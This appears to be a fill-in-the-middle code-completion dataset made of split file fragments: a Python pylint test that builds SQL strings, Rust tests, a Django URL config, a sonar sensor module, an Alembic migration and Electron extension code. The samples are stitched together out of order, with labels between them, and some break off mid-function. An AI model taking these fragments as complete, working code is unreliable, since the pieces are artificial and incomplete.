factor = (float(specs.Status) / float(specs.Status))
txt = "WHERE?AND (%s / 1) * %s > 0\n" % (1, factor)
return txt
def run(self):
specs = self.getRecorda()
leaves = Label.getTreeLeaves(specs.RootLabel)
query7 = Query()
query7.sql = "SELECT SerNr, %s,\n" % codeOrder("SerNr", leaves)
query7.sql += monthCode("[al].TransDate")
query7.sql += "\n, %s, \n" % self.getExtra2(test=1)
query7.sql += self.getExtra2(0)
query7.sql += "\nFROM %s al\n" % specs.name()
query7.sql += self.getExtra("1", "2", val3="33")
query7.sql += self.getExtra4()
query7.sql += self.getExtra5("WHERE?AND :1")
query7.sql += self.getExtra6()
query7.sql += self.getExtra7()
method = getattr(self, "getExtra3____"[:-4])
query7.sql += method()
query7.open()
self.run2([100, 200])
def run2(self, extraList):
query2 = Query()
query2.sql = self.getMore(extraList)
query2.open()
def getMore(self, moreList):
return "SELECT * FROM Alotment WHERE SerNr IN ('%s')" % "','".join(moreList)
| lis = []
labs = specs.Labels.split(",")
for lb in labs:
lis.append("','".join(Label.getTreeLeaves(lb)))
labels = "','".join(lis) | conditional_block |
func_noerror_query_getattr.py | # pylint:disable=R0201
from OpenOrange import *
from Document import Document
from Label import Label
from SQLTools import codeOrder, monthCode
from datetime import datetime
class AlotmentDoc(Document):
classattr = "classattr"
def getRecorda(self):
class newObj(object):
Status = 1
RootLabel = "100"
SerNr = "SerNr"
Labels = "100,200"
TransDate = datetime.now().date()
def name(self):
return "Alotment"
return newObj()
def getExtra(self, val1, val2="2", val3="3", val4=4):
specs = self.getRecorda()
sql = "WHERE?AND [al].{%s} IN ('%s')\n" % ("SerNr", "','".join([val1, val3, val2]))
sql += "WHERE?AND [al].{SerNr} = i|%i|\n" % specs.Status
sql += "WHERE?AND [al].TransDate < d|%s|\n" % specs.TransDate
sql += "WHERE?AND SerNr = "
if specs.Status == 1:
sql += "%s" % val4
if 1 in [0, 0]:
pass
else:
sql += ""
return sql
def getExtra2(self, test):
parent = self
specs = self.getRecorda()
mydict = {1:1, 2:2}
mylist = [1, 2]
listcomp = "listcomp," + "extra"
if test > 0:
return specs.Status | x += "'%s' as test_time\n, " % time("")
x += "'%i' as test_len\n, " % len(specs.RootLabel)
x += "'%s' as test_map\n, " % "','".join(map(str, mylist))
x += "'%s' as test_keys\n, " % "','".join(mydict.keys())
x += "'%s' as test_subscript\n," % ["SerNr","RoomType"][specs.Status]
#x += "'%s' as test_classattr\n, " % self.classattr
x += '"%s" as test_dic\n, ' % mydict
x += "'%s' as test_parentattr\n, " % parent.record #Parent None attribute
x += '"%s" as test_binoplist\n, ' % mylist #+ mylist
x += '"%s" as test_listcomp1\n, ' % "".join([a.strip() for a in listcomp.split(',')])
x += '"%s" as test_listcomp2\n, ' % "".join([d for d in listcomp])
x += '"%s" as test_listcomp3\n, ' % "".join([str(b) for b in listcomp])
x += '"%s" as test_listcomp4\n,' % "".join([c.strip() for c in listcomp])
x += '"%s" as test_listcomp5\n,' % [('s|%s|') % (z) for z in mylist]
x += '"%s" as test_listcomp6\n,' % "".join([y for y in ("a", "b")])
# pylint:disable=E1101
x += '"%s" as inferenceErr\n,' % self.non.existant
x += '"%s" as indexErr\n' % mylist[2]
return x
def getExtra3(self):
specs = self.getRecorda()
subquery = Query()
subquery.sql = "SerNr"
return "ORDER BY %s, %s" % (specs.SerNr, subquery.sql)
def getExtra4(self):
specs = self.getRecorda()
labels = None
if specs.Labels:
lis = []
labs = specs.Labels.split(",")
for lb in labs:
lis.append("','".join(Label.getTreeLeaves(lb)))
labels = "','".join(lis)
return "WHERE?AND SerNr IN ('%s') " % labels
def getExtra5(self, txt):
txt = txt.replace(":1","RoomType IS NULL\n")
return txt
def getExtra6(self):
txt = ""
q = {}
q["one"] = Query()
q["one"].sql = "WHERE?AND SerNr IS NULL\n"
q["two"] = Query()
q["two"].sql = "WHERE?AND SerNr IS NOT NULL\n"
slist = ["one", "two"]
for index in slist:
txt += q[index].sql
return txt
def getExtra7(self):
specs = self.getRecorda()
factor = 0.0
if 1 > 0:
factor = (float(specs.Status) / float(specs.Status))
txt = "WHERE?AND (%s / 1) * %s > 0\n" % (1, factor)
return txt
def run(self):
specs = self.getRecorda()
leaves = Label.getTreeLeaves(specs.RootLabel)
query7 = Query()
query7.sql = "SELECT SerNr, %s,\n" % codeOrder("SerNr", leaves)
query7.sql += monthCode("[al].TransDate")
query7.sql += "\n, %s, \n" % self.getExtra2(test=1)
query7.sql += self.getExtra2(0)
query7.sql += "\nFROM %s al\n" % specs.name()
query7.sql += self.getExtra("1", "2", val3="33")
query7.sql += self.getExtra4()
query7.sql += self.getExtra5("WHERE?AND :1")
query7.sql += self.getExtra6()
query7.sql += self.getExtra7()
method = getattr(self, "getExtra3____"[:-4])
query7.sql += method()
query7.open()
self.run2([100, 200])
def run2(self, extraList):
query2 = Query()
query2.sql = self.getMore(extraList)
query2.open()
def getMore(self, moreList):
return "SELECT * FROM Alotment WHERE SerNr IN ('%s')" % "','".join(moreList) | x = "'%s' as test_date\n, " % date("") | random_line_split |
hessenberg.rs | use std::cmp;
use nl::Hessenberg;
use na::{DMatrix, Matrix4};
quickcheck!{
fn hessenberg(n: usize) -> bool {
if n != 0 {
let n = cmp::min(n, 25);
let m = DMatrix::<f64>::new_random(n, n);
match Hessenberg::new(m.clone()) {
Some(hess) => {
let h = hess.h();
let p = hess.p();
relative_eq!(m, &p * h * p.transpose(), epsilon = 1.0e-7)
},
None => true
}
}
else {
true
}
}
fn hessenberg_static(m: Matrix4<f64>) -> bool {
match Hessenberg::new(m) {
Some(hess) => {
let h = hess.h();
let p = hess.p();
| }
}
} | relative_eq!(m, p * h * p.transpose(), epsilon = 1.0e-7)
},
None => true | random_line_split |
mpq.rs |
use std::fs::File;
use std::io::Read;
use std::ptr::copy_nonoverlapping;
// Result:
// 11011010100010101000001001101
// 1101101010001
fn sp(){
let bytes: [u8; 4] = [77, 80, 81, 27];
let buf_a: [u8; 2] = [77, 80];
let buf_b: [u8; 2] = [81, 27];
let mut num_a: u32 = 0;
let mut num_b: u32 = 0;
unsafe {
copy_nonoverlapping(buf_a.as_ptr(), &mut num_a as *mut u32 as *mut u8, 2);
copy_nonoverlapping(buf_b.as_ptr(), &mut num_b as *mut u32 as *mut u8, 2);
}
println!("SP Bits: {:16b} {:16b}", num_a.to_le(), num_b.to_le());
}
fn main() | {
sp();
let mut f: File = File::open("test.replay").unwrap();
let mut buf = [0u8; 4];
let size = f.read(&mut buf).unwrap();
let mut data: u32 = 0;
unsafe {
copy_nonoverlapping(buf.as_ptr(), &mut data as *mut u32 as *mut u8, 4)
}
let bits = data.to_le();
let _string = std::str::from_utf8(&buf).unwrap().to_owned();
println!("String: {:?} ", _string );
println!("Bytes: {:?} Size: {:?}", buf, size);
println!("U32: {:?} Bits: {:b}", bits, bits );
} | identifier_body |
|
mpq.rs |
use std::fs::File;
use std::io::Read;
use std::ptr::copy_nonoverlapping;
// Result:
// 11011010100010101000001001101
// 1101101010001
fn | (){
let bytes: [u8; 4] = [77, 80, 81, 27];
let buf_a: [u8; 2] = [77, 80];
let buf_b: [u8; 2] = [81, 27];
let mut num_a: u32 = 0;
let mut num_b: u32 = 0;
unsafe {
copy_nonoverlapping(buf_a.as_ptr(), &mut num_a as *mut u32 as *mut u8, 2);
copy_nonoverlapping(buf_b.as_ptr(), &mut num_b as *mut u32 as *mut u8, 2);
}
println!("SP Bits: {:16b} {:16b}", num_a.to_le(), num_b.to_le());
}
fn main() {
sp();
let mut f: File = File::open("test.replay").unwrap();
let mut buf = [0u8; 4];
let size = f.read(&mut buf).unwrap();
let mut data: u32 = 0;
unsafe {
copy_nonoverlapping(buf.as_ptr(), &mut data as *mut u32 as *mut u8, 4)
}
let bits = data.to_le();
let _string = std::str::from_utf8(&buf).unwrap().to_owned();
println!("String: {:?} ", _string );
println!("Bytes: {:?} Size: {:?}", buf, size);
println!("U32: {:?} Bits: {:b}", bits, bits );
} | sp | identifier_name |
mpq.rs | use std::fs::File;
use std::io::Read;
use std::ptr::copy_nonoverlapping;
// Result: | let bytes: [u8; 4] = [77, 80, 81, 27];
let buf_a: [u8; 2] = [77, 80];
let buf_b: [u8; 2] = [81, 27];
let mut num_a: u32 = 0;
let mut num_b: u32 = 0;
unsafe {
copy_nonoverlapping(buf_a.as_ptr(), &mut num_a as *mut u32 as *mut u8, 2);
copy_nonoverlapping(buf_b.as_ptr(), &mut num_b as *mut u32 as *mut u8, 2);
}
println!("SP Bits: {:16b} {:16b}", num_a.to_le(), num_b.to_le());
}
fn main() {
sp();
let mut f: File = File::open("test.replay").unwrap();
let mut buf = [0u8; 4];
let size = f.read(&mut buf).unwrap();
let mut data: u32 = 0;
unsafe {
copy_nonoverlapping(buf.as_ptr(), &mut data as *mut u32 as *mut u8, 4)
}
let bits = data.to_le();
let _string = std::str::from_utf8(&buf).unwrap().to_owned();
println!("String: {:?} ", _string );
println!("Bytes: {:?} Size: {:?}", buf, size);
println!("U32: {:?} Bits: {:b}", bits, bits );
} | // 11011010100010101000001001101
// 1101101010001
fn sp(){ | random_line_split |
urls.py | # This file is part of django-doubleoptin-contactform.
# django-doubleoptin-contactform is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# django-doubleoptin-contactform is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with Foobar. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls.defaults import *
from django.views.generic.simple import direct_to_template
urlpatterns = patterns('',
(r'^$', 'doptincf.views.contact'),
(r'^received/$', direct_to_template, {'template': 'contact/received.html'}), | ) | (r'^(?P<contact_id>\d+)/verify/$', 'doptincf.views.verify'),
(r'^received/$', direct_to_template, {'template': 'contact/verified.html'}), | random_line_split |
sonar.js | var Board = require("../lib/board.js"),
events = require("events"),
util = require("util");
/**
* Sonar
* @constructor
*
* @param {Object} opts Options: pin (analog)
*/
function Sonar( opts ) |
// Set the pin to ANALOG mode
this.mode = this.firmata.MODES.ANALOG;
this.firmata.pinMode( this.pin, this.mode );
this.firmata.analogRead( this.pin, function( data ) {
this.voltage = data;
samples.push( data );
}.bind(this));
// Throttle
setInterval(function() {
var err;
err = null;
// Nothing read since previous interval
if ( samples.length === 0 ) {
return;
}
median = samples.sort()[ Math.floor( samples.length / 2 ) ];
// Emit throttled event
this.emit( "read", err, median );
// If the median value for this interval is not the same as the
// median value in the last interval, fire a "change" event.
//
if ( last && median && (median.toFixed(1) !== last.toFixed(1)) ) {
this.emit( "change", err, median );
}
// Store this media value for comparison
// in next interval
last = median;
// Reset samples;
samples.length = 0;
}.bind(this), this.freq );
Object.defineProperties( this, {
// Based on the voltage,
// Calculate the distance in inches and centimeters
inches: {
get: function() {
return +(( 254 / 1024 ) * 2 * median).toFixed(1);
}
},
cm: {
get: function() {
return +(( median / 2 ) * 2.54).toFixed(1);
}
}
});
}
util.inherits( Sonar, events.EventEmitter );
module.exports = Sonar;
// Reference
//
// http://www.maxbotix.com/tutorials.htm#Code_example_for_the_BasicX_BX24p
// http://www.electrojoystick.com/tutorial/?page_id=285
// Tutorials
//
// http://www.sensorpedia.com/blog/how-to-interface-an-ultrasonic-rangefinder-with-sensorpedia-via-twitter-guide-2/
| {
if ( !(this instanceof Sonar) ) {
return new Sonar( opts );
}
var median, last, samples;
median = 0;
last = 0;
samples = [];
// Initialize a Device instance on a Board
Board.Device.call(
this, opts = Board.Options( opts )
);
// Sonar instance properties
this.freq = opts.freq || 100;
this.voltage = null; | identifier_body |
sonar.js | var Board = require("../lib/board.js"),
events = require("events"),
util = require("util");
/**
* Sonar
* @constructor
*
* @param {Object} opts Options: pin (analog)
*/
function Sonar( opts ) {
if ( !(this instanceof Sonar) ) |
var median, last, samples;
median = 0;
last = 0;
samples = [];
// Initialize a Device instance on a Board
Board.Device.call(
this, opts = Board.Options( opts )
);
// Sonar instance properties
this.freq = opts.freq || 100;
this.voltage = null;
// Set the pin to ANALOG mode
this.mode = this.firmata.MODES.ANALOG;
this.firmata.pinMode( this.pin, this.mode );
this.firmata.analogRead( this.pin, function( data ) {
this.voltage = data;
samples.push( data );
}.bind(this));
// Throttle
setInterval(function() {
var err;
err = null;
// Nothing read since previous interval
if ( samples.length === 0 ) {
return;
}
median = samples.sort()[ Math.floor( samples.length / 2 ) ];
// Emit throttled event
this.emit( "read", err, median );
// If the median value for this interval is not the same as the
// median value in the last interval, fire a "change" event.
//
if ( last && median && (median.toFixed(1) !== last.toFixed(1)) ) {
this.emit( "change", err, median );
}
// Store this media value for comparison
// in next interval
last = median;
// Reset samples;
samples.length = 0;
}.bind(this), this.freq );
Object.defineProperties( this, {
// Based on the voltage,
// Calculate the distance in inches and centimeters
inches: {
get: function() {
return +(( 254 / 1024 ) * 2 * median).toFixed(1);
}
},
cm: {
get: function() {
return +(( median / 2 ) * 2.54).toFixed(1);
}
}
});
}
util.inherits( Sonar, events.EventEmitter );
module.exports = Sonar;
// Reference
//
// http://www.maxbotix.com/tutorials.htm#Code_example_for_the_BasicX_BX24p
// http://www.electrojoystick.com/tutorial/?page_id=285
// Tutorials
//
// http://www.sensorpedia.com/blog/how-to-interface-an-ultrasonic-rangefinder-with-sensorpedia-via-twitter-guide-2/
| {
return new Sonar( opts );
} | conditional_block |
sonar.js | var Board = require("../lib/board.js"),
events = require("events"),
util = require("util");
/**
* Sonar
* @constructor
*
* @param {Object} opts Options: pin (analog)
*/
function | ( opts ) {
if ( !(this instanceof Sonar) ) {
return new Sonar( opts );
}
var median, last, samples;
median = 0;
last = 0;
samples = [];
// Initialize a Device instance on a Board
Board.Device.call(
this, opts = Board.Options( opts )
);
// Sonar instance properties
this.freq = opts.freq || 100;
this.voltage = null;
// Set the pin to ANALOG mode
this.mode = this.firmata.MODES.ANALOG;
this.firmata.pinMode( this.pin, this.mode );
this.firmata.analogRead( this.pin, function( data ) {
this.voltage = data;
samples.push( data );
}.bind(this));
// Throttle
setInterval(function() {
var err;
err = null;
// Nothing read since previous interval
if ( samples.length === 0 ) {
return;
}
median = samples.sort()[ Math.floor( samples.length / 2 ) ];
// Emit throttled event
this.emit( "read", err, median );
// If the median value for this interval is not the same as the
// median value in the last interval, fire a "change" event.
//
if ( last && median && (median.toFixed(1) !== last.toFixed(1)) ) {
this.emit( "change", err, median );
}
// Store this media value for comparison
// in next interval
last = median;
// Reset samples;
samples.length = 0;
}.bind(this), this.freq );
Object.defineProperties( this, {
// Based on the voltage,
// Calculate the distance in inches and centimeters
inches: {
get: function() {
return +(( 254 / 1024 ) * 2 * median).toFixed(1);
}
},
cm: {
get: function() {
return +(( median / 2 ) * 2.54).toFixed(1);
}
}
});
}
util.inherits( Sonar, events.EventEmitter );
module.exports = Sonar;
// Reference
//
// http://www.maxbotix.com/tutorials.htm#Code_example_for_the_BasicX_BX24p
// http://www.electrojoystick.com/tutorial/?page_id=285
// Tutorials
//
// http://www.sensorpedia.com/blog/how-to-interface-an-ultrasonic-rangefinder-with-sensorpedia-via-twitter-guide-2/
| Sonar | identifier_name |
sonar.js | var Board = require("../lib/board.js"),
events = require("events"),
util = require("util");
/**
* Sonar
* @constructor
*
* @param {Object} opts Options: pin (analog)
*/
function Sonar( opts ) {
if ( !(this instanceof Sonar) ) {
return new Sonar( opts );
}
var median, last, samples;
median = 0;
last = 0;
samples = [];
// Initialize a Device instance on a Board
Board.Device.call(
this, opts = Board.Options( opts )
);
// Sonar instance properties
this.freq = opts.freq || 100;
this.voltage = null;
// Set the pin to ANALOG mode
this.mode = this.firmata.MODES.ANALOG;
this.firmata.pinMode( this.pin, this.mode );
this.firmata.analogRead( this.pin, function( data ) {
this.voltage = data;
samples.push( data ); |
// Throttle
setInterval(function() {
var err;
err = null;
// Nothing read since previous interval
if ( samples.length === 0 ) {
return;
}
median = samples.sort()[ Math.floor( samples.length / 2 ) ];
// Emit throttled event
this.emit( "read", err, median );
// If the median value for this interval is not the same as the
// median value in the last interval, fire a "change" event.
//
if ( last && median && (median.toFixed(1) !== last.toFixed(1)) ) {
this.emit( "change", err, median );
}
// Store this media value for comparison
// in next interval
last = median;
// Reset samples;
samples.length = 0;
}.bind(this), this.freq );
Object.defineProperties( this, {
// Based on the voltage,
// Calculate the distance in inches and centimeters
inches: {
get: function() {
return +(( 254 / 1024 ) * 2 * median).toFixed(1);
}
},
cm: {
get: function() {
return +(( median / 2 ) * 2.54).toFixed(1);
}
}
});
}
util.inherits( Sonar, events.EventEmitter );
module.exports = Sonar;
// Reference
//
// http://www.maxbotix.com/tutorials.htm#Code_example_for_the_BasicX_BX24p
// http://www.electrojoystick.com/tutorial/?page_id=285
// Tutorials
//
// http://www.sensorpedia.com/blog/how-to-interface-an-ultrasonic-rangefinder-with-sensorpedia-via-twitter-guide-2/ | }.bind(this)); | random_line_split |
files.py | # -*- coding: utf-8 -*-
"""
equip.utils.files
~~~~~~~~~~~~~~~~~
:copyright: (c) 2014 by Romain Gaucher (@rgaucher)
:license: Apache 2, see LICENSE for more details.
"""
import os
__normalize_path = lambda x: os.path.abspath(x) |
def file_extension(filename):
if '.' not in filename:
return None
return filename[filename.rfind('.') + 1:].lower()
def good_ext(fext, l=None):
return fext.lower() in l if l else False
def scan_dir(directory, files, l_ext=None):
names = os.listdir(directory)
for name in names:
srcname = __normalize_path(os.path.join(directory, name))
try:
if os.path.isdir(srcname):
try:
scan_dir(srcname, files, l_ext)
except:
continue
elif os.path.isfile(srcname) \
and (not l_ext \
or good_ext(srcname[srcname.rfind('.')+1:], l_ext)):
if srcname not in files:
files.append(srcname)
except IOError, error:
continue
def list_dir(directory):
subdirs = os.listdir(directory)
if not subdirs:
return []
return [os.path.join(directory, k) for k in subdirs] | random_line_split |
|
files.py | # -*- coding: utf-8 -*-
"""
equip.utils.files
~~~~~~~~~~~~~~~~~
:copyright: (c) 2014 by Romain Gaucher (@rgaucher)
:license: Apache 2, see LICENSE for more details.
"""
import os
__normalize_path = lambda x: os.path.abspath(x)
def file_extension(filename):
|
def good_ext(fext, l=None):
return fext.lower() in l if l else False
def scan_dir(directory, files, l_ext=None):
names = os.listdir(directory)
for name in names:
srcname = __normalize_path(os.path.join(directory, name))
try:
if os.path.isdir(srcname):
try:
scan_dir(srcname, files, l_ext)
except:
continue
elif os.path.isfile(srcname) \
and (not l_ext \
or good_ext(srcname[srcname.rfind('.')+1:], l_ext)):
if srcname not in files:
files.append(srcname)
except IOError, error:
continue
def list_dir(directory):
subdirs = os.listdir(directory)
if not subdirs:
return []
return [os.path.join(directory, k) for k in subdirs]
| if '.' not in filename:
return None
return filename[filename.rfind('.') + 1:].lower() | identifier_body |
files.py | # -*- coding: utf-8 -*-
"""
equip.utils.files
~~~~~~~~~~~~~~~~~
:copyright: (c) 2014 by Romain Gaucher (@rgaucher)
:license: Apache 2, see LICENSE for more details.
"""
import os
__normalize_path = lambda x: os.path.abspath(x)
def file_extension(filename):
if '.' not in filename:
return None
return filename[filename.rfind('.') + 1:].lower()
def | (fext, l=None):
return fext.lower() in l if l else False
def scan_dir(directory, files, l_ext=None):
names = os.listdir(directory)
for name in names:
srcname = __normalize_path(os.path.join(directory, name))
try:
if os.path.isdir(srcname):
try:
scan_dir(srcname, files, l_ext)
except:
continue
elif os.path.isfile(srcname) \
and (not l_ext \
or good_ext(srcname[srcname.rfind('.')+1:], l_ext)):
if srcname not in files:
files.append(srcname)
except IOError, error:
continue
def list_dir(directory):
subdirs = os.listdir(directory)
if not subdirs:
return []
return [os.path.join(directory, k) for k in subdirs]
| good_ext | identifier_name |
files.py | # -*- coding: utf-8 -*-
"""
equip.utils.files
~~~~~~~~~~~~~~~~~
:copyright: (c) 2014 by Romain Gaucher (@rgaucher)
:license: Apache 2, see LICENSE for more details.
"""
import os
__normalize_path = lambda x: os.path.abspath(x)
def file_extension(filename):
if '.' not in filename:
return None
return filename[filename.rfind('.') + 1:].lower()
def good_ext(fext, l=None):
return fext.lower() in l if l else False
def scan_dir(directory, files, l_ext=None):
names = os.listdir(directory)
for name in names:
srcname = __normalize_path(os.path.join(directory, name))
try:
if os.path.isdir(srcname):
|
elif os.path.isfile(srcname) \
and (not l_ext \
or good_ext(srcname[srcname.rfind('.')+1:], l_ext)):
if srcname not in files:
files.append(srcname)
except IOError, error:
continue
def list_dir(directory):
subdirs = os.listdir(directory)
if not subdirs:
return []
return [os.path.join(directory, k) for k in subdirs]
| try:
scan_dir(srcname, files, l_ext)
except:
continue | conditional_block |
53b71e7c45b5_add_fields_for_mivs_show_info_checklist_.py | """Add fields for MIVS show_info checklist item
Revision ID: 53b71e7c45b5
Revises: ad26fcaafb78
Create Date: 2019-11-25 19:37:15.322579
"""
# revision identifiers, used by Alembic.
revision = '53b71e7c45b5'
down_revision = 'ad26fcaafb78'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
try:
is_sqlite = op.get_context().dialect.name == 'sqlite'
except Exception:
is_sqlite = False
if is_sqlite:
op.get_context().connection.execute('PRAGMA foreign_keys=ON;')
utcnow_server_default = "(datetime('now', 'utc'))"
else:
utcnow_server_default = "timezone('utc', current_timestamp)"
def sqlite_column_reflect_listener(inspector, table, column_info):
"""Adds parenthesis around SQLite datetime defaults for utcnow."""
if column_info['default'] == "datetime('now', 'utc')":
column_info['default'] = utcnow_server_default |
# ===========================================================================
# HOWTO: Handle alter statements in SQLite
#
# def upgrade():
# if is_sqlite:
# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:
# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)
# else:
# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)
#
# ===========================================================================
def upgrade():
op.add_column('indie_studio', sa.Column('contact_phone', sa.Unicode(), server_default='', nullable=False))
op.add_column('indie_studio', sa.Column('show_info_updated', sa.Boolean(), server_default='False', nullable=False))
def downgrade():
op.drop_column('indie_studio', 'show_info_updated')
op.drop_column('indie_studio', 'contact_phone') |
sqlite_reflect_kwargs = {
'listeners': [('column_reflect', sqlite_column_reflect_listener)]
} | random_line_split |
53b71e7c45b5_add_fields_for_mivs_show_info_checklist_.py | """Add fields for MIVS show_info checklist item
Revision ID: 53b71e7c45b5
Revises: ad26fcaafb78
Create Date: 2019-11-25 19:37:15.322579
"""
# revision identifiers, used by Alembic.
revision = '53b71e7c45b5'
down_revision = 'ad26fcaafb78'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
try:
is_sqlite = op.get_context().dialect.name == 'sqlite'
except Exception:
is_sqlite = False
if is_sqlite:
op.get_context().connection.execute('PRAGMA foreign_keys=ON;')
utcnow_server_default = "(datetime('now', 'utc'))"
else:
utcnow_server_default = "timezone('utc', current_timestamp)"
def sqlite_column_reflect_listener(inspector, table, column_info):
"""Adds parenthesis around SQLite datetime defaults for utcnow."""
if column_info['default'] == "datetime('now', 'utc')":
column_info['default'] = utcnow_server_default
sqlite_reflect_kwargs = {
'listeners': [('column_reflect', sqlite_column_reflect_listener)]
}
# ===========================================================================
# HOWTO: Handle alter statements in SQLite
#
# def upgrade():
# if is_sqlite:
# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:
# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)
# else:
# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)
#
# ===========================================================================
def | ():
op.add_column('indie_studio', sa.Column('contact_phone', sa.Unicode(), server_default='', nullable=False))
op.add_column('indie_studio', sa.Column('show_info_updated', sa.Boolean(), server_default='False', nullable=False))
def downgrade():
op.drop_column('indie_studio', 'show_info_updated')
op.drop_column('indie_studio', 'contact_phone')
| upgrade | identifier_name |
53b71e7c45b5_add_fields_for_mivs_show_info_checklist_.py | """Add fields for MIVS show_info checklist item
Revision ID: 53b71e7c45b5
Revises: ad26fcaafb78
Create Date: 2019-11-25 19:37:15.322579
"""
# revision identifiers, used by Alembic.
revision = '53b71e7c45b5'
down_revision = 'ad26fcaafb78'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
try:
is_sqlite = op.get_context().dialect.name == 'sqlite'
except Exception:
is_sqlite = False
if is_sqlite:
|
else:
utcnow_server_default = "timezone('utc', current_timestamp)"
def sqlite_column_reflect_listener(inspector, table, column_info):
"""Adds parenthesis around SQLite datetime defaults for utcnow."""
if column_info['default'] == "datetime('now', 'utc')":
column_info['default'] = utcnow_server_default
sqlite_reflect_kwargs = {
'listeners': [('column_reflect', sqlite_column_reflect_listener)]
}
# ===========================================================================
# HOWTO: Handle alter statements in SQLite
#
# def upgrade():
# if is_sqlite:
# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:
# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)
# else:
# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)
#
# ===========================================================================
def upgrade():
op.add_column('indie_studio', sa.Column('contact_phone', sa.Unicode(), server_default='', nullable=False))
op.add_column('indie_studio', sa.Column('show_info_updated', sa.Boolean(), server_default='False', nullable=False))
def downgrade():
op.drop_column('indie_studio', 'show_info_updated')
op.drop_column('indie_studio', 'contact_phone')
| op.get_context().connection.execute('PRAGMA foreign_keys=ON;')
utcnow_server_default = "(datetime('now', 'utc'))" | conditional_block |
53b71e7c45b5_add_fields_for_mivs_show_info_checklist_.py | """Add fields for MIVS show_info checklist item
Revision ID: 53b71e7c45b5
Revises: ad26fcaafb78
Create Date: 2019-11-25 19:37:15.322579
"""
# revision identifiers, used by Alembic.
revision = '53b71e7c45b5'
down_revision = 'ad26fcaafb78'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
try:
is_sqlite = op.get_context().dialect.name == 'sqlite'
except Exception:
is_sqlite = False
if is_sqlite:
op.get_context().connection.execute('PRAGMA foreign_keys=ON;')
utcnow_server_default = "(datetime('now', 'utc'))"
else:
utcnow_server_default = "timezone('utc', current_timestamp)"
def sqlite_column_reflect_listener(inspector, table, column_info):
"""Adds parenthesis around SQLite datetime defaults for utcnow."""
if column_info['default'] == "datetime('now', 'utc')":
column_info['default'] = utcnow_server_default
sqlite_reflect_kwargs = {
'listeners': [('column_reflect', sqlite_column_reflect_listener)]
}
# ===========================================================================
# HOWTO: Handle alter statements in SQLite
#
# def upgrade():
# if is_sqlite:
# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:
# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)
# else:
# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)
#
# ===========================================================================
def upgrade():
op.add_column('indie_studio', sa.Column('contact_phone', sa.Unicode(), server_default='', nullable=False))
op.add_column('indie_studio', sa.Column('show_info_updated', sa.Boolean(), server_default='False', nullable=False))
def downgrade():
| op.drop_column('indie_studio', 'show_info_updated')
op.drop_column('indie_studio', 'contact_phone') | identifier_body |
|
stocks.py | import numpy as np
import pandas as pd
from bokeh.plotting import * | "http://ichart.yahoo.com/table.csv?s=AAPL&a=0&b=1&c=2000",
parse_dates=['Date'])
GOOG = pd.read_csv(
"http://ichart.yahoo.com/table.csv?s=GOOG&a=0&b=1&c=2000",
parse_dates=['Date'])
MSFT = pd.read_csv(
"http://ichart.yahoo.com/table.csv?s=MSFT&a=0&b=1&c=2000",
parse_dates=['Date'])
IBM = pd.read_csv(
"http://ichart.yahoo.com/table.csv?s=IBM&a=0&b=1&c=2000",
parse_dates=['Date'])
output_file("stocks.html", title="stocks.py example")
# EXERCISE: turn on plot hold
# EXERCISE: finish this line plot, and add more for the other stocks. Each one should
# have a legend, and its own color.
line(
AAPL['Date'], # x coordinates
AAPL['Adj Close'], # y coordinates
color='#A6CEE3', # set a color for the line
legend='AAPL', # attach a legend label
x_axis_type = "datetime", # NOTE: only needed on first
tools="pan,wheel_zoom,box_zoom,reset,previewsave" # NOTE: only needed on first
)
# EXERCISE: style the plot, set a title, lighten the gridlines, etc.
# EXERCISE: start a new figure
# Here is some code to compute the 30-day moving average for AAPL
aapl = AAPL['Adj Close']
aapl_dates = AAPL['Date']
window_size = 30
window = np.ones(window_size)/float(window_size)
aapl_avg = np.convolve(aapl, window, 'same')
# EXERCISE: plot a scatter of circles for the individual AAPL prices with legend
# 'close'. Remember to set the x axis type and tools on the first renderer.
# EXERCISE: plot a line of the AAPL moving average data with the legeng 'avg'
# EXERCISE: style the plot, set a title, lighten the gridlines, etc.
show() # open a browser |
# Here is some code to read in some stock data from the Yahoo Finance API
AAPL = pd.read_csv( | random_line_split |
context-menus-main.js | const {ipcFuncMain, ipcFuncMainCb, getIpcNameFunc, sendToBackgroundPage} = require('./util-main')
const {ipcMain} = require('electron')
const getIpcName = getIpcNameFunc('ContextMenus')
const extInfos = require('../../extensionInfos')
const sharedState = require('../../sharedStateMain')
ipcMain.on('get-extension-menu',(e) => ipcMain.emit('get-extension-menu-reply', null, sharedState.extensionMenu))
ipcMain.on('chrome-context-menus-clicked', async (e, extensionId, tabId, info)=>{
sendToBackgroundPage(extensionId, getIpcName('onClicked'), info, tabId)
})
ipcFuncMainCb('contextMenus', 'create', (e, extensionId, createProperties, cb)=> {
console.log('contextMenu', 'create', extensionId, createProperties)
const manifest = extInfos[extensionId].manifest
const icon = Object.values(manifest.icons)[0]
const menuItemId = createProperties.id
if(!sharedState.extensionMenu[extensionId]) sharedState.extensionMenu[extensionId] = []
sharedState.extensionMenu[extensionId].push({properties: createProperties, menuItemId, icon})
